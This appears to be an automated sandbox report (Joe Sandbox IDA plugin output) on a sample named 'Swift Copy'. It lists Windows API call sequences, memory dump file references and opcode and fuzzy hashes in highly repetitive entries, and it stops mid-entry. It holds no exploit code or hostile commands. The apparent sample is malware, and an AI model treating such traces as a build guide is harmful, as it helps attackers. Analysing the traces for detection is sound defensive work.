                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: da3e2584f05c767df764252ceddb14e63da611069e3abe75708b7c0050231de2
                                              • Instruction ID: ea5f54cf8da737455daa375d7cf56fefbb67aa7f92e09486142ea066cb4bc39f
                                              • Opcode Fuzzy Hash: da3e2584f05c767df764252ceddb14e63da611069e3abe75708b7c0050231de2
                                              • Instruction Fuzzy Hash: D421B276604219BFDB10EFA9CC88CBB73ACFB093647148566FA14DB290E670DC8587B0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7842
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7868
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD786B
                                              • SysAllocString.OLEAUT32 ref: 00DD788C
                                              • SysFreeString.OLEAUT32 ref: 00DD7895
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD78AF
                                              • SysAllocString.OLEAUT32(?), ref: 00DD78BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 21ec1aea2de6a0c8717112ad10c179dfed00d289358b982f15d61eedb1e44d1b
                                              • Instruction ID: 5c4df460d169f237fa76aeb6202c9fd372b4316584ca71b6883ec5803cbc8016
                                              • Opcode Fuzzy Hash: 21ec1aea2de6a0c8717112ad10c179dfed00d289358b982f15d61eedb1e44d1b
                                              • Instruction Fuzzy Hash: 1321B331608205AFDB10AFB9DC8DDAA77ECFB083607148166F915DB2A1E670DC85DB74
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00DE04F2
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE052E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction ID: 072b83b3ddac6e609c43915de2d8ba03248a0c7fb8828c2c90c0df9cedfe94df
                                              • Opcode Fuzzy Hash: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction Fuzzy Hash: 4E218B71500346AFDB20AF2ADC04A9A7BB4AF45724F244A19F8E5E62E0D7B0D984CF30
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE0601
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction ID: a53aa399b5d23c43fb0666f1c4b1a9ecebb2a6ff2d06dda4a7171f46ac30c52c
                                              • Opcode Fuzzy Hash: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction Fuzzy Hash: 692171755003459FDB20AF6A9C04B5A7BA4AF95720F240B1DE8A1E72E0D7B198E0CB30
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E04112
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E0411F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E0412A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E04139
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E04145
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction ID: 11fc14566f48002d0fc0539d2b14f1a99fe2b90d776a01aa2e143e22c854d82b
                                              • Opcode Fuzzy Hash: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction Fuzzy Hash: D81190B214021DBEEF218F65CC85EE77FADEF08798F005110BB58B2090CA729C61DBA4
                                              APIs
                                                • Part of subcall function 00DAD7A3: _free.LIBCMT ref: 00DAD7CC
                                              • _free.LIBCMT ref: 00DAD82D
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD838
                                              • _free.LIBCMT ref: 00DAD843
                                              • _free.LIBCMT ref: 00DAD897
                                              • _free.LIBCMT ref: 00DAD8A2
                                              • _free.LIBCMT ref: 00DAD8AD
                                              • _free.LIBCMT ref: 00DAD8B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction ID: 13ce301860316431b6f6fd2844b88eb3675d6a87dc2d7551de2928f3ad9e8ff0
                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction Fuzzy Hash: 68115E71580B04AAD621BFB1CC47FDB7BDDEF02B00F400C25B29BA68A2DB75B5058A71
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DDDA74
                                              • LoadStringW.USER32(00000000), ref: 00DDDA7B
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DDDA91
                                              • LoadStringW.USER32(00000000), ref: 00DDDA98
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DDDADC
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00DDDAB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 4072794657-3128320259
                                              • Opcode ID: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
                                              • Instruction ID: 71d895031068f903d595d52ccbe9e0e405070f5aab6a60973bc8370a7fc49197
                                              • Opcode Fuzzy Hash: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
                                              • Instruction Fuzzy Hash: A80162F69002087FEB109BE49D89EE7766CE708701F544592B746F2081E6759EC88F74
                                              APIs
                                              • InterlockedExchange.KERNEL32(00F3C0D0,00F3C0D0), ref: 00DE097B
                                              • EnterCriticalSection.KERNEL32(00F3C0B0,00000000), ref: 00DE098D
                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00DE099B
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DE09A9
                                              • CloseHandle.KERNEL32(00000000), ref: 00DE09B8
                                              • InterlockedExchange.KERNEL32(00F3C0D0,000001F6), ref: 00DE09C8
                                              • LeaveCriticalSection.KERNEL32(00F3C0B0), ref: 00DE09CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction ID: b3eb706199c93ddc0a8a2d4dd17bee8c3ea4c99d239ddd81260ad50d609a5cb0
                                              • Opcode Fuzzy Hash: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction Fuzzy Hash: D2F0CD31442912AFD7516F95EE89AD67A35BF05702F541215F10160CB1C77694E9CFA0
                                              APIs
                                              • __allrem.LIBCMT ref: 00DA00BA
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA00D6
                                              • __allrem.LIBCMT ref: 00DA00ED
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA010B
                                              • __allrem.LIBCMT ref: 00DA0122
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA0140
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction ID: ac6263d317d888dacc10d57f9d52b2beb2995abadbf03f4b3b3552418955af1d
                                              • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction Fuzzy Hash: D981F672A00B069BEB209F68CC41BAB77E9EF46334F28453AF551D7281E770D9058BB4
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D982D9,00D982D9,?,?,?,00DA644F,00000001,00000001,8BE85006), ref: 00DA6258
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DA644F,00000001,00000001,8BE85006,?,?,?), ref: 00DA62DE
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DA63D8
                                              • __freea.LIBCMT ref: 00DA63E5
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6,?,00D71129), ref: 00DA3852
                                              • __freea.LIBCMT ref: 00DA63EE
                                              • __freea.LIBCMT ref: 00DA6413
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction ID: 779bdfb478266bb6f985b2d2693505f336785502977ad7981ad9205f325869bd
                                              • Opcode Fuzzy Hash: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction Fuzzy Hash: E951AE72A00216EFDF259F64CC81EAF7AAAEF46750F1D4629F805D6180EB34DC45C6B0
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBCCA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBD25
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBD6A
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DFBD99
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DFBDF3
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFBDFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                              • String ID:
                                              • API String ID: 1120388591-0
                                              • Opcode ID: 0b655ab2941135260acf2f07854c71597247d85989929def099dcfe931f5197c
                                              • Instruction ID: 8dccc435ba079524d7a55774acbc51c962b7b35efa9b806534c58278ef0dc84b
                                              • Opcode Fuzzy Hash: 0b655ab2941135260acf2f07854c71597247d85989929def099dcfe931f5197c
                                              • Instruction Fuzzy Hash: 4F81B030108245EFD714DF24C891E2ABBE5FF84318F19855DF59A4B2A2DB32ED45CBA2
                                              APIs
                                              • VariantInit.OLEAUT32(00000035), ref: 00DCF7B9
                                              • SysAllocString.OLEAUT32(00000001), ref: 00DCF860
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF889
                                              • VariantClear.OLEAUT32(00DCFA64), ref: 00DCF8AD
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF8B1
                                              • VariantClear.OLEAUT32(?), ref: 00DCF8BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCopy$AllocInitString
                                              • String ID:
                                              • API String ID: 3859894641-0
                                              • Opcode ID: ef2136ac924fe73a0028808a204d9b6c572c88b71318e77c6d19915bde18c8ea
                                              • Instruction ID: 746479a0237a8239928421fa75a133d29ae9b97f9fb50b671fc6bc4f9a7c5d8b
                                              • Opcode Fuzzy Hash: ef2136ac924fe73a0028808a204d9b6c572c88b71318e77c6d19915bde18c8ea
                                              • Instruction Fuzzy Hash: A651B536600312ABCF14AB65D895FADB3A6EF45710B24946BE905DF291EB708C40CB77
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00DE94E5
                                              • _wcslen.LIBCMT ref: 00DE9506
                                              • _wcslen.LIBCMT ref: 00DE952D
                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00DE9585
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$FileName$OpenSave
                                              • String ID: X
                                              • API String ID: 83654149-3081909835
                                              • Opcode ID: 4c9b809763faf2380d6a7fb0ddac00e65d576472deef3f74691d5477f550c0cc
                                              • Instruction ID: 8d85d8c90a22b4530620be0eef0afdc8e5278cb44fe08f46e1825210b9342daa
                                              • Opcode Fuzzy Hash: 4c9b809763faf2380d6a7fb0ddac00e65d576472deef3f74691d5477f550c0cc
                                              • Instruction Fuzzy Hash: 9FE19F715043409FD724EF25C891A6AB7E0FF85314F18896DF8899B2A2EB31DD45CBB2
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • BeginPaint.USER32(?,?,?), ref: 00D89241
                                              • GetWindowRect.USER32(?,?), ref: 00D892A5
                                              • ScreenToClient.USER32(?,?), ref: 00D892C2
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D892D3
                                              • EndPaint.USER32(?,?,?,?,?), ref: 00D89321
                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DC71EA
                                                • Part of subcall function 00D89339: BeginPath.GDI32(00000000), ref: 00D89357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
